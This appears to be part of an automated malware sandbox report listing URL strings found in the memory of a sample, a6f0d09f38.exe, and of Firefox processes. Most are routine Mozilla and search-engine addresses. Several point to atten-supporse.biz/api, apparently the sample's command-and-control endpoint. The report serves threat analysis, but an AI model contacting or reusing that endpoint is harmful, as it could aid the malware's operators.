Source: a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiH
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2627978100.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiZqY2EqXqknUgpH6oCFyW/SwlkltNsdwG0IiPX9UX11rVdhzlFCaipm6aO0i/7CII7Y
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apif0cK3T
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001C.00000003.2925812595.000001DEF10B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationschr
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3012755816.000001DEEAC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
